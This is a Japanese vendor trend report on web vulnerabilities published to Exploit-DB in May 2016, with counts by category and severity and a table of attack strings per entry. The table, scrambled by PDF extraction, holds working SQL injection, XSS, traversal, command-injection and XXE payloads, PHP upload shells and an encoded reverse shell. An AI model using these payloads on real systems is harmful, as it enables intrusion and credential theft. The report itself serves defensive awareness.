Untitled - Penta Security Systems Inc.

2016.05
EDB-Report
最新Web脆弱性トレンドレポート(2016.05)
2016.05.01~2016.05.31 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。
ペンタセキュリティシステムズ株式会社R&Dセンター データセキュリティチーム
サマリー
2016年5月に公開されたExploit-DBの分析結果、クロスサイトスクリプティング(Cross Site Scripting)の攻撃に対する脆弱性報告数が最も多かったです。クロスサイトスクリプティング(Cross Site Scripting)
攻撃は、一般的にパラメーター値を利用して攻撃する方法です。しかし、5月発見された攻撃は、キーの値もしくは特定HTTP HeaderのValueを狙う攻撃が主に発見されました。このような攻撃は特定のプログラム
の上でのみ発生される脆弱性です。当該プログラムを使用する管理者は、脆弱性にさらされたページを確認して、ソースコード上のセキュアコーディングが至急です。また、5月は、コマンド インジェクション(Command
Injection)と関連した多彩な攻撃パターンも発見されました。コマンド インジェクション(Command Injection)攻撃は、脆弱な命令語または関数をパラメーターとしても利用し、該当動作をすぐ実行させることがで
きます。したがって、特別な場合を除いては、関連命令語や関数を使用しないことをお勧めします。もし、該当命令語と関数を必ず使用しなければならない場合なら、入力値を検証するフィルターにパイプ(|)、セミコ
ロン(;)などのマルチラインを支援する特殊文字に対する検証を行い、該当関数に有害な値が渡されないようにしなければなりません。関連の脆弱性が発見されたソフトウェアを使用する管理者は脆弱性が発見され
たページやパラメーターを確認して、多様なコマンド インジェクション(Command Injection)攻撃に対して備える必要があります。
1. 脆弱性別件数
脆弱性カテゴリ
脆弱性別件数
件数
インフォメーションディスクロージャー
(Information Disclosure)
ローカルファイル挿入
(Local File Inclusion:LFI)
35
29
1
30
25
2
20
ディレクトリトラバーサル
(Directory Traversal)
2
ファイルアップロード
(File Upload)
3
コマンド インジェクション
(Command Injection)
5
SQL インジェクション
(SQL Injection)
7
15
クロスサイトスクリプティング
(Cross Site Scripting : XSS)
合計
2
1
2
7
5
3
9
10
5
0
9
29
危険度別分類
2. 危険度別件数
件数
危険度
割合
早急対応要
2
7%
高
22
76%
中
5
17%
合計
29
100%
2
5
早急対応要
高
中
22
3. 攻撃実行の難易度別件数
難易度
件数
割合
難
1
3%
中
6
21%
易
22
76%
合計
29
100%
攻撃実行の難易度別件数
1
6
難
中
易
22
4. 主なソフトウェア別脆弱性発生件数
ソフトウェア名
IPFire
XenAPI
AirOS
Real Estate Portal
Web2py
ProcessMaker
AfterLogic WebMail
Acunetix WP Security
EduSec
DNSmasq
ZeewaysCMS - Multiple Vulnerabilities
Open Source Real Estate Script
ZeewaysCMS
ManageEngine Password Manager
PHP Realestate Script Script
PHP Imagick
Magento
eXtplorer
FlatPress
CakePHP
SAP xMII
件数
4
2
2
2
2
2
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
合計
29
主なソフトウェア別脆弱性発生件数
IPFire
XenAPI
AirOS
1
1
1
4
Real Estate Portal
1
1
Web2py
2
1
ProcessMaker
1
2
1
AfterLogic WebMail
1
2
1
1
2
1
1
1
1
Copyright 2016 Penta Security Systems Inc. All rights reserved
2
Acunetix WP Security
EduSec
DNSmasq
ZeewaysCMS - Multiple
Vulnerabilities
Open Source Real Estate Script
EDB-Report
最新Web脆弱性トレンドレポート(2016.05)
2016.05.01~2016.05.31 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。
危険度分類基準
早急対応要:攻撃が成功した場合システムへ侵入可
高:システム情報を取得するか、あるいはクライアントに2次被害を及ぼす
中:情報漏洩
攻撃実行難易度分類基準
難:複数の脆弱性を突いた攻撃パターン、対象のシステムの重要な情報を取得
するため、高度な攻撃コードを採用したパターン、知らされていない攻撃
コードを採用したパターンのいずれかに該当する
中:攻撃手法自体は難しくないが、迂回コードを採用したパターン
易:1回のリクエストで攻撃が成立するパターン、複数回トライするも、
既知の攻撃コードを採用したパターンのいずれかに該当する
** 5件以上発生した主なソフトウェア別脆弱性の詳細情報
EDB 番号
脆弱性カテゴリ
攻撃難易度
危険度
Copyright 2016 Penta Security Systems Inc. All rights reserved
脆弱性名
ソフトウェア名
EDB-Report
最新Web脆弱性トレンドレポート(2016.05)
2016.05.01~2016.05.31 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。
日付
EDB番号
脆弱性カテゴリ
攻撃難脆弱性度
危険度
脆弱性名
2016-05-04
39766
Command Injection
易
高
PHP Imagick 3.3.0 - / command
/image.jpg"|cat /etc/passwd>a.txt"
injection 脆弱性
2016-05-04
39765
XSS
易
中
/cgi-bin/ipinfo.cgi?<script>alert(/RXSS-Yann_CAM_IPFire < 2.19 Core Update 101 _Security_Consultant_@ASafety_-_SYNETIS/)</script>
ipinfo.cgi XSS 脆弱性
2016-05-04
39761
XSS
易
高
Acunetix WP Security Plugin 3.0.3
- XSS 脆弱性
攻撃コード
/wordpress/?s="><script>alert("Johto.Robbie"</script>
対象プログラム
対象環境
PHP Imagick
PHP Imagick
3.3.0
IPFire
IPFire < 2.19 Core
Update 10
Acunetix WP
Security
Acunetix WP
Security Plugin
3.0.
/cgibin/ipinfo.cgi?<script>eval(unescape("%76%61%72%20%68
%65%61%64%3D%64%6F%63%75%6D%65%6E%74%2E%6
2016-05-04
39765
XSS
中
高
IPFire < 2.19 Core Update 101 ipinfo.cgi XSS 脆弱性 (2)
7%65%74%45%6C%65%6D%65%6E%74%73%42%79%54%
61%67%4E%61%6D%65%28%27%68%65%61%64%27%29
IPFire
%5B%30%5D%3B%76%61%72%20%73%63%72%69%70%7
IPFire < 2.19 Core
Update 10
4%3D%20%64%6F%63%75%6D%65%6E%74%2E%63%72%
65%61%74%65%45%6C%65%6D%65%6E%74%28%27%73
%63%72%69%70%74%27%29%3B%73%63%72%69%70%7
POST / HTTP/1.1
Host:
User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64
IPFire < 2.19 Core Update 101 - AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75
2016-05-04
39765
Command Injection
中
高
ipinfo.cgi Command Injection 脆 Safari/535.7
弱性 (3)
IPFire
Accept: */*
IPFire < 2.19 Core
Update 10
Content-Type: application/x-www-form-urlencoded;
charset=UTF-8
POST / HTTP/1.1
Host:
User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64
AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75
Safari/535.7
IPFire < 2.19 Core Update 101 - Accept: */*
2016-05-04
39765
Command Injection
易
中
ipinfo.cgi Command Injection 脆 Content-Type: application/x-www-form-urlencoded;
弱性 (4)
IPFire
charset=UTF-8
IPFire < 2.19 Core
Update 10
NCSA_PASS=||eval `echo -e
"YXdrICdCRUdJTiB7cyA9ICIvaW5ldC90Y3AvMC8xOTIuMTY4
LjAuMi8xMzM3Ijsg\\\\\\\\nd2hpbGUoNDIpIHsgZG97
IHByaW50ZiAic2hlbGw+IiB8JiBzOyBzIHwmIGdldGxp\\\\
ManageEngine Applications
2016-05-06
39780
SQL Injection
中
早急対応要
Manager Build 12700 downTimeScheduler.do SQL
Injection 脆弱性
2016-05-09
39784
Directory Traversal
中
高
ZeewaysCMS - createPDF.php
Directory Traversal 脆弱性
/downTimeScheduler.do?method=viewMaintenanceTask&t
askid=1%20UNION%20ALL%20SELECT%201,2,database(),4,5,6,7,8,
9,10,11,12,13,14,15%20--
/createPDF.php?targeturl=Ly4uLy4uLy4uLy4uLy4uLy4uLy4u
Ly4uL2V0Yy9wYXNzd2Q=&&pay_id=4&&type=actual
Copyright 2016 Penta Security Systems Inc. All rights reserved
ManageEngine
Applications
Manager
ManageEngine
Applications
Manager Build
1270
ZeewaysCMS Multiple
Vulnerabilities
ZeewaysCMS
EDB-Report
最新Web脆弱性トレンドレポート(2016.05)
2016.05.01~2016.05.31 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。
日付
EDB番号
脆弱性カテゴリ
攻撃難脆弱性度
危険度
脆弱性名
攻撃コード
対象プログラム
対象環境
ZeewaysCMS
ZeewaysCMS
Web2py
Web2py 2.14.5
POST / HTTP/1.1
Host:
User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64
AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75
2016-05-09
39784
XSS
易
高
ZeewaysCMS - createPDF.php
XSS 脆弱性 (2)
Safari/535.7
Accept: */*
Content-Type: application/x-www-form-urlencoded;
charset=UTF-8
screen_name="><script><<imgIMG SRC=oi
onerror=JaVaScript:alert(1)>
POST /admin/default/pack_custom/test HTTP/1.1
Host:
User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64
AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75
2016-05-16
39821
LFI
易
高
Web2py 2.14.5 - pack_custom
Safari/535.7
LFI 脆弱性(1)
Accept: */*
Content-Type: application/x-www-form-urlencoded;
charset=UTF-8
file=/etc/passwd
/dns_dhcp/dns/dns.php?net=1%20and%20(select%201%20
Web interface for DNSmasq /
2016-05-16
39817
SQL Injection
中
早急対応要
from(select%20count(*),concat((select%20(select%20concat(
Mikrotik - dns.php SQL Injection 0x2b,host,0x2b,user,0x2b,password,0x2b))%20from%20mys
脆弱性
DNSmasq
ql.user%20limit%201),floor(rand(0)*2))x%20from%20mysql.u
Web interface for
DNSmasq
ser%20group%20by%20x)a)
POST / HTTP/1.1
Host:
2016-05-16
39816
File Upload
易
高
eXtplorer 2.1.9 - Archive Path
Traversal
Connection: CloseAccept: text/html, application/xhtml+xml,
*/*
eXtplorer
eXtplorer 2.1.
Accept-Language: ko-KR
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows
NT 6.2; WOW64; Trident/6.0)
GET /cake/cake3/ HTTP/1.1
2016-05-16
39813
XSS
易
高
2016-05-16
39821
XSS
易
高
CakePHP Framework 3.2.4 /cake/cake3/ XSS 脆弱性
Web2py 2.14.5 /admin/default/install_plugin/
XSS 脆弱性
2016-05-17
39837
Directory Traversal
易
中
Host:
CLIENT-IP: 100.200.300.400 <script>alert('poc');</script>
/admin/default/install_plugin/test?plugin=math2py&source
=javascript:alert(1)
SAP xMII 15.0 - /XMII/ Directory /XMII/Catalog?Mode=GetFileList&Path=Classes/../../../../../../
Traversal 脆弱性
../../../../../../etc/passwd
CakePHP
CakePHP
Framework 3.2.4
Web2py
Web2py 2.14.5
SAP xMII
SAP xMII 15.0
Magento
Magento < 2.0.6
POST /rest/V1/guest-carts/test/set-payment-information
Magento < 2.0.6 2016-05-18
39838
Command Injection
難
高
Unauthenticated Arbitrary
Unserialize -> Arbitrary Write File
HTTP/1.1
Host:
User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64
AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75
Safari/535.7
/api.php?action=getGroup&value=' UNION ALL SELECT
2016-05-23
39849
SQL Injection
易
高
XenAPI 1.4.1 for XenForo -
NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CCONCAT(I
Multiple SQL Injections (2)
FNULL(CAST(%40%40HOSTNAME AS
CHAR)%2C0x20))%2CNULL%23
Copyright 2016 Penta Security Systems Inc. All rights reserved
XenAPI
XenAPI 1.4.1 for
XenForo
EDB-Report
最新Web脆弱性トレンドレポート(2016.05)
2016.05.01~2016.05.31 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。
日付
EDB番号
脆弱性カテゴリ
攻撃難脆弱性度
危険度
2016-05-23
39849
SQL Injection
易
高
2016-05-24
39850
Information
Disclosure
脆弱性名
XenAPI 1.4.1 for XenForo Multiple SQL Injections
攻撃コード
/api.php?action=getUsers&value=' UNION ALL SELECT
CONCAT(IFNULL(CAST(%40%40HOSTNAME AS
高
XenAPI
CHAR)%2C0x20))%2CNULL%23
AfterLogic WebMail Pro ASP.NET /spellcheck.aspx?xml=<?xml version="1.0" encoding="utf易
対象プログラム
6.2.6 - Administrator Account
8"?> <!DOCTYPE root [ <!ENTITY % remote SYSTEM
Disclosure via XXE Injection
"http://81.17.25.9/test.dtd"> %remote; %int; %trick;]>
AfterLogic
WebMail
対象環境
XenAPI 1.4.1 for
XenForo
AfterLogic
WebMail Pro
ASP.NET 6.2.6
POST /upload.php HTTP/1.1
Host:
Connection: CloseAccept: text/html, application/xhtml+xml,
*/*
Accept-Language: ko-KR
2016-05-26
39855
File Upload
易
中
Real Estate Portal 4.1 - File
Upload (2)
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows
NT 6.2; WOW64; Trident/6.0)
Real Estate Portal
Content-Type: multipart/form-data; boundary=-------------
Real Estate Portal
4.1
--------------7dd10029908f2
-----------------------------7dd10029908f2
Content-Disposition: form-data; name="file";
filename="Test.php"
/student/stu2016-05-26
39856
SQL Injection
易
高
EduSec 4.2.5 - SQL Injection
master/view?id=2%20UniOn%20SeleCt%201,load_file(%27/
EduSec
EduSec 4.2.5
etc/passwd%27),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--
2016-05-26
39855
XSS
易
中
2016-05-27
39864
SQL Injection
易
高
Real Estate Portal 4.1 - XSS (1)
/index.php?title=onmousemove=alert(1)
Real Estate Portal
Real Estate Portal
4.1
/single.php?view_id=PHP Realestate Script Script 4.9.0 57+/*!50000union*/+select+1,2,user_name,4,5,6,7,8,passwo
- SQL Injection
rd,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from
PHP Realestate
PHP Realestate
Script Script
Script Script 4.9.0
+admin_login
/contact_view.php?contact=2016-05-30
39868
SQL Injection
易
高
Open Source Real Estate Script
3.6.0 - SQL Injection
25527%27+/*!50000union*/+select+1,2,3,4,5,6,7,8,9,10,11,1 Open Source Real Open Source Real
0,13,14,15,16,17,18,19,20,username,22,password,24,25,26,2
Estate Script
Estate Script 3.6.0
7,28,29,30,31,32,33,34,35,36,37+/*!50000from*/+/*!50000a
POST / HTTP/1.1
Host:
User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64
AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75
ProcessMaker 3.0.1.7 2016-05-31
39872
XSS
易
高
/sysworkflow/en/neoclassic/proce
ssProxy/saveProcess XSS 脆弱性
Safari/535.7
Accept: */*
Content-Type: application/x-www-form-urlencoded;
charset=UTF-8
PRO_TITLE=AA<img src=x
onerror=alert(1)>A&PRO_DESCRIPTION=BBB&PRO_CATEG
ORY=
Copyright 2016 Penta Security Systems Inc. All rights reserved
ProcessMaker
ProcessMaker
3.0.1.7
EDB-Report
最新Web脆弱性トレンドレポート(2016.05)
2016.05.01~2016.05.31 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。
日付
2016-05-31
EDB番号
39871
脆弱性カテゴリ
LFI
攻撃難脆弱性度
易
危険度
高
脆弱性名
AirOS NanoStation M2 5.6-beta scr.cgi LFI 脆弱性
攻撃コード
対象プログラム
対象環境
AirOS
NanoStation M2
AirOS
/scr.cgi?fname=../../../../../etc/passwd%00&status=
5.6-bet
POST /flatpress/admin.php?p=uploader&action=default
HTTP/1.1
Host:
Connection: CloseAccept: text/html, application/xhtml+xml,
*/*
Accept-Language: ko-KR
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows
NT 6.2; WOW64; Trident/6.0)
2016-05-31
39870
File Upload
易
高
FlatPress 1.0.3 - admin.php File Content-Type: multipart/form-data; boundary=------------Upload 脆弱性
--------------7dd10029908f2
FlatPress
FlatPress 1.0.3
-----------------------------7dd10029908f2
Content-Disposition: form-data; name="upload[]";
filename="test.php"
Content-Type: application/octet-stream
<? phpinfo(); ?>
-----------------------------7dd10029908f2-POST /sysworkflow/en/neoclassic/processes/processesList
HTTP/1.1
Host:
User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64
AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75
ProcessMaker 3.0.1.7 2016-05-31
39872
XSS
易
高
Safari/535.7
/sysworkflow/en/neoclassic/proce Accept: */*
ProcessMaker
sses/processesList XSS 脆弱性 # Content-Type: application/x-www-form-urlencoded;
ProcessMaker
3.0.1.7
charset=UTF-8
processName=<img src=x
onerror=alert(1);>&start=0&limit=25&category=%3Creset
%3E=
AirOS NanoStation M2 5.6-beta 2016-05-31
39871
Command Injection
中
高
scr.cgi Command Injection 脆弱
性
/scr.cgi?fname=rc.poststart.sh;cat%20/etc/hosts%00&status
=
Copyright 2016 Penta Security Systems Inc. All rights reserved
AirOS
AirOS
NanoStation M2
5.6-bet